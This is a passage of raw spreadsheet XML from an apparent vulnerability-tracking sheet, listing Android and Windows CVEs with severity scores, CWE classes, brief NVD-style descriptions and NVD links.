t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P770" s="5" t="inlineStr" /><c r="Q770" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R770" s="5" t="inlineStr"><is><t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t></is></c></row><row r="771"><c r="A771" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B771" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C771" s="5" t="inlineStr"><is><t>CVE-2026-28653</t></is></c><c r="D771" s="5" t="n"><v>7.8</v></c><c r="E771" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F771" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G771" s="5" t="inlineStr" /><c r="H771" s="5" t="n"><v>0.001</v></c><c r="I771" s="5" t="inlineStr" /><c r="J771" s="5" t="inlineStr" /><c r="K771" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L771" s="5" t="inlineStr" /><c r="M771" s="5" t="inlineStr" /><c r="N771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O771" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P771" s="5" t="inlineStr" /><c r="Q771" s="5" t="inlineStr"><is><t>CWE-1190, CWE-787</t></is></c><c r="R771" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t></is></c></row><row r="772"><c r="A772" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C772" s="5" t="inlineStr"><is><t>CVE-2026-28655</t></is></c><c r="D772" s="5" t="n"><v>7.8</v></c><c r="E772" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F772" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G772" s="5" t="inlineStr" /><c r="H772" s="5" t="n"><v>0.001</v></c><c r="I772" s="5" t="inlineStr" /><c r="J772" s="5" t="inlineStr" /><c r="K772" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L772" s="5" t="inlineStr" /><c r="M772" s="5" t="inlineStr" /><c r="N772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P772" s="5" t="inlineStr" /><c r="Q772" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R772" s="5" t="inlineStr"><is><t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t></is></c></row><row r="773"><c r="A773" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B773" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C773" s="5" t="inlineStr"><is><t>CVE-2026-28657</t></is></c><c r="D773" s="5" t="n"><v>7.8</v></c><c r="E773" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F773" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G773" s="5" t="inlineStr" /><c r="H773" s="5" t="n"><v>0.001</v></c><c r="I773" s="5" t="inlineStr" /><c r="J773" s="5" t="inlineStr" /><c r="K773" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L773" s="5" t="inlineStr" /><c r="M773" s="5" t="inlineStr" /><c r="N773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O773" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P773" s="5" t="inlineStr" /><c r="Q773" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R773" s="5" t="inlineStr"><is><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is></c><c r="S773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t></is></c></row><row r="774"><c r="A774" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B774" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C774" s="5" t="inlineStr"><is><t>CVE-2026-28658</t></is></c><c r="D774" s="5" t="n"><v>7.8</v></c><c r="E774" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F774" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G774" s="5" t="inlineStr" /><c r="H774" s="5" t="n"><v>0.001</v></c><c r="I774" s="5" t="inlineStr" /><c r="J774" s="5" t="inlineStr" /><c r="K774" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L774" s="5" t="inlineStr" /><c r="M774" s="5" t="inlineStr" /><c r="N774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O774" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P774" s="5" t="inlineStr" /><c r="Q774" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R774" s="5" t="inlineStr"><is><t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t></is></c></row><row r="775"><c r="A775" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B775" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C775" s="5" t="inlineStr"><is><t>CVE-2026-28659</t></is></c><c r="D775" s="5" t="n"><v>7.8</v></c><c r="E775" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G775" s="5" t="inlineStr" /><c r="H775" s="5" t="n"><v>0.001</v></c><c r="I775" s="5" t="inlineStr" /><c r="J775" s="5" t="inlineStr" /><c r="K775" s="5" t="inlineStr"><is><t>google:android_xr</t></is></c><c r="L775" s="5" t="inlineStr" /><c r="M775" s="5" t="inlineStr" /><c r="N775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O775" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P775" s="5" t="inlineStr" /><c r="Q775" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R775" s="5" t="inlineStr"><is><t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t></is></c></row><row r="776"><c r="A776" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B776" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C776" s="5" t="inlineStr"><is><t>CVE-2026-28663</t></is></c><c r="D776" s="5" t="n"><v>7.8</v></c><c r="E776" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F776" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G776" s="5" t="inlineStr" /><c r="H776" s="5" t="n"><v>0.001</v></c><c r="I776" s="5" t="inlineStr" /><c r="J776" s="5" t="inlineStr" /><c r="K776" s="5" t="inlineStr" /><c r="L776" s="5" t="inlineStr" /><c r="M776" s="5" t="inlineStr" /><c r="N776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O776" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P776" s="5" t="inlineStr" /><c r="Q776" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R776" s="5" t="inlineStr"><is><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is></c><c r="S776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t></is></c></row><row r="777"><c r="A777" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C777" s="5" t="inlineStr"><is><t>CVE-2026-28664</t></is></c><c r="D777" s="5" t="n"><v>7.8</v></c><c r="E777" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F777" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G777" s="5" t="inlineStr" /><c r="H777" s="5" t="n"><v>0.001</v></c><c r="I777" s="5" t="inlineStr" /><c r="J777" s="5" t="inlineStr" /><c r="K777" s="5" t="inlineStr" /><c r="L777" s="5" t="inlineStr" /><c r="M777" s="5" t="inlineStr" /><c r="N777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P777" s="5" t="inlineStr" /><c r="Q777" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R777" s="5" t="inlineStr"><is><t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t></is></c></row><row r="778"><c r="A778" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C778" s="5" t="inlineStr"><is><t>CVE-2026-28668</t></is></c><c r="D778" s="5" t="n"><v>7.8</v></c><c r="E778" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F778" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G778" s="5" t="inlineStr" /><c r="H778" s="5" t="n"><v>0.001</v></c><c r="I778" s="5" t="inlineStr" /><c r="J778" s="5" t="inlineStr" /><c r="K778" s="5" t="inlineStr" /><c r="L778" s="5" t="inlineStr" /><c r="M778" s="5" t="inlineStr" /><c r="N778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P778" s="5" t="inlineStr" /><c r="Q778" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R778" s="5" t="inlineStr"><is><t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t></is></c></row><row r="779"><c r="A779" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B779" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C779" s="5" t="inlineStr"><is><t>CVE-2026-45515</t></is></c><c r="D779" s="5" t="n"><v>7.8</v></c><c r="E779" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F779" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G779" s="5" t="inlineStr" /><c r="H779" s="5" t="n"><v>0.001</v></c><c r="I779" s="5" t="inlineStr" /><c r="J779" s="5" t="inlineStr" /><c r="K779" s="5" t="inlineStr" /><c r="L779" s="5" t="inlineStr" /><c r="M779" s="5" t="inlineStr" /><c r="N779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O779" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P779" s="5" t="inlineStr" /><c r="Q779" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="R779" s="5" t="inlineStr"><is><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is></c><c r="S779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t></is></c></row><row r="780"><c r="A780" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B780" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C780" s="5" t="inlineStr"><is><t>CVE-2026-45520</t></is></c><c r="D780" s="5" t="n"><v>7.8</v></c><c r="E780" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F780" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G780" s="5" t="inlineStr" /><c r="H780" s="5" t="n"><v>0.001</v></c><c r="I780" s="5" t="inlineStr" /><c r="J780" s="5" t="inlineStr" /><c r="K780" s="5" t="inlineStr" /><c r="L780" s="5" t="inlineStr" /><c r="M780" s="5" t="inlineStr" /><c r="N780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O780" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P780" s="5" t="inlineStr" /><c r="Q780" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R780" s="5" t="inlineStr"><is><t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t></is></c></row><row r="781"><c r="A781" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C781" s="5" t="inlineStr"><is><t>CVE-2026-45531</t></is></c><c r="D781" s="5" t="n"><v>7.8</v></c><c r="E781" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F781" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G781" s="5" t="inlineStr" /><c r="H781" s="5" t="n"><v>0.001</v></c><c r="I781" s="5" t="inlineStr" /><c r="J781" s="5" t="inlineStr" /><c r="K781" s="5" t="inlineStr" /><c r="L781" s="5" t="inlineStr" /><c r="M781" s="5" t="inlineStr" /><c r="N781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P781" s="5" t="inlineStr" /><c r="Q781" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R781" s="5" t="inlineStr"><is><t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t></is></c></row><row r="782"><c r="A782" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C782" s="5" t="inlineStr"><is><t>CVE-2026-49881</t></is></c><c r="D782" s="5" t="n"><v>7.8</v></c><c r="E782" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F782" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G782" s="5" t="inlineStr" /><c r="H782" s="5" t="n"><v>0.001</v></c><c r="I782" s="5" t="inlineStr" /><c r="J782" s="5" t="inlineStr" /><c r="K782" s="5" t="inlineStr" /><c r="L782" s="5" t="inlineStr" /><c r="M782" s="5" t="inlineStr" /><c r="N782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P782" s="5" t="inlineStr" /><c r="Q782" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R782" s="5" t="inlineStr"><is><t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t></is></c></row><row r="783"><c r="A783" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B783" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C783" s="5" t="inlineStr"><is><t>CVE-2026-49884</t></is></c><c r="D783" s="5" t="n"><v>7.8</v></c><c r="E783" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F783" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G783" s="5" t="inlineStr" /><c r="H783" s="5" t="n"><v>0.001</v></c><c r="I783" s="5" t="inlineStr" /><c r="J783" s="5" t="inlineStr" /><c r="K783" s="5" t="inlineStr" /><c r="L783" s="5" t="inlineStr" /><c r="M783" s="5" t="inlineStr" /><c r="N783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O783" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P783" s="5" t="inlineStr" /><c r="Q783" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R783" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t></is></c></row><row r="784"><c r="A784" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C784" s="5" t="inlineStr"><is><t>CVE-2026-49887</t></is></c><c r="D784" s="5" t="n"><v>7.8</v></c><c r="E784" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F784" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G784" s="5" t="inlineStr" /><c r="H784" s="5" t="n"><v>0.001</v></c><c r="I784" s="5" t="inlineStr" /><c r="J784" s="5" t="inlineStr" /><c r="K784" s="5" t="inlineStr" /><c r="L784" s="5" t="inlineStr" /><c r="M784" s="5" t="inlineStr" /><c r="N784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P784" s="5" t="inlineStr" /><c r="Q784" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R784" s="5" t="inlineStr"><is><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is></c><c r="S784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t></is></c></row><row r="785"><c r="A785" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C785" s="5" t="inlineStr"><is><t>CVE-2026-49918</t></is></c><c r="D785" s="5" t="n"><v>7.8</v></c><c r="E785" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F785" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G785" s="5" t="inlineStr" /><c r="H785" s="5" t="n"><v>0.001</v></c><c r="I785" s="5" t="inlineStr" /><c r="J785" s="5" t="inlineStr" /><c r="K785" s="5" t="inlineStr" /><c r="L785" s="5" t="inlineStr" /><c r="M785" s="5" t="inlineStr" /><c r="N785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P785" s="5" t="inlineStr" /><c r="Q785" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R785" s="5" t="inlineStr"><is><t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t></is></c></row><row r="786"><c r="A786" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C786" s="5" t="inlineStr"><is><t>CVE-2026-49919</t></is></c><c r="D786" s="5" t="n"><v>7.8</v></c><c r="E786" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F786" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G786" s="5" t="inlineStr" /><c r="H786" s="5" t="n"><v>0.001</v></c><c r="I786" s="5" t="inlineStr" /><c r="J786" s="5" t="inlineStr" /><c r="K786" s="5" t="inlineStr" /><c r="L786" s="5" t="inlineStr" /><c r="M786" s="5" t="inlineStr" /><c r="N786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P786" s="5" t="inlineStr" /><c r="Q786" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R786" s="5" t="inlineStr"><is><t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t></is></c></row><row r="787"><c r="A787" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B787" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C787" s="5" t="inlineStr"><is><t>CVE-2026-49927</t></is></c><c r="D787" s="5" t="n"><v>7.8</v></c><c r="E787" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F787" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G787" s="5" t="inlineStr" /><c r="H787" s="5" t="n"><v>0.001</v></c><c r="I787" s="5" t="inlineStr" /><c r="J787" s="5" t="inlineStr" /><c r="K787" s="5" t="inlineStr" /><c r="L787" s="5" t="inlineStr" /><c r="M787" s="5" t="inlineStr" /><c r="N787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O787" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P787" s="5" t="inlineStr" /><c r="Q787" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R787" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t></is></c></row><row r="788"><c r="A788" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B788" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C788" s="5" t="inlineStr"><is><t>CVE-2026-49932</t></is></c><c r="D788" s="5" t="n"><v>7.8</v></c><c r="E788" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F788" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G788" s="5" t="inlineStr" /><c r="H788" s="5" t="n"><v>0.001</v></c><c r="I788" s="5" t="inlineStr" /><c r="J788" s="5" t="inlineStr" /><c r="K788" s="5" t="inlineStr" /><c r="L788" s="5" t="inlineStr" /><c r="M788" s="5" t="inlineStr" /><c r="N788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O788" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P788" s="5" t="inlineStr" /><c r="Q788" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R788" s="5" t="inlineStr"><is><t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t></is></c></row><row r="789"><c r="A789" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B789" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C789" s="5" t="inlineStr"><is><t>CVE-2026-55273</t></is></c><c r="D789" s="5" t="n"><v>7.8</v></c><c r="E789" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F789" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G789" s="5" t="inlineStr" /><c r="H789" s="5" t="n"><v>0.001</v></c><c r="I789" s="5" t="inlineStr" /><c r="J789" s="5" t="inlineStr" /><c r="K789" s="5" t="inlineStr" /><c r="L789" s="5" t="inlineStr" /><c r="M789" s="5" t="inlineStr" /><c r="N789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O789" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P789" s="5" t="inlineStr" /><c r="Q789" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R789" s="5" t="inlineStr"><is><t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t></is></c></row><row r="790"><c r="A790" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B790" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C790" s="5" t="inlineStr"><is><t>CVE-2026-55285</t></is></c><c r="D790" s="5" t="n"><v>7.8</v></c><c r="E790" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F790" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G790" s="5" t="inlineStr" /><c r="H790" s="5" t="n"><v>0.001</v></c><c r="I790" s="5" t="inlineStr" /><c r="J790" s="5" t="inlineStr" /><c r="K790" s="5" t="inlineStr" /><c r="L790" s="5" t="inlineStr" /><c r="M790" s="5" t="inlineStr" /><c r="N790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O790" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P790" s="5" t="inlineStr" /><c r="Q790" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R790" s="5" t="inlineStr"><is><t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t></is></c></row><row r="791"><c r="A791" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C791" s="5" t="inlineStr"><is><t>CVE-2026-55294</t></is></c><c r="D791" s="5" t="n"><v>7.8</v></c><c r="E791" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F791" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G791" s="5" t="inlineStr" /><c r="H791" s="5" t="n"><v>0.001</v></c><c r="I791" s="5" t="inlineStr" /><c r="J791" s="5" t="inlineStr" /><c r="K791" s="5" t="inlineStr" /><c r="L791" s="5" t="inlineStr" /><c r="M791" s="5" t="inlineStr" /><c r="N791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P791" s="5" t="inlineStr" /><c r="Q791" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R791" s="5" t="inlineStr"><is><t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t></is></c></row><row r="792"><c r="A792" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C792" s="5" t="inlineStr"><is><t>CVE-2026-56172</t></is></c><c r="D792" s="5" t="n"><v>7.8</v></c><c r="E792" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F792" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G792" s="5" t="inlineStr" /><c r="H792" s="5" t="n"><v>0.003</v></c><c r="I792" s="5" t="inlineStr" /><c r="J792" s="5" t="inlineStr" /><c r="K792" s="5" t="inlineStr" /><c r="L792" s="5" t="inlineStr" /><c r="M792" s="5" t="inlineStr" /><c r="N792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P792" s="5" t="inlineStr" /><c r="Q792" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R792" s="5" t="inlineStr"><is><t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t></is></c></row><row r="793"><c r="A793" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C793" s="5" t="inlineStr"><is><t>CVE-2026-56177</t></is></c><c r="D793" s="5" t="n"><v>7.8</v></c><c r="E793" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F793" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G793" s="5" t="inlineStr" /><c r="H793" s="5" t="n"><v>0.003</v></c><c r="I793" s="5" t="inlineStr" /><c r="J793" s="5" t="inlineStr" /><c r="K793" s="5" t="inlineStr" /><c r="L793" s="5" t="inlineStr" /><c r="M793" s="5" t="inlineStr" /><c r="N793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P793" 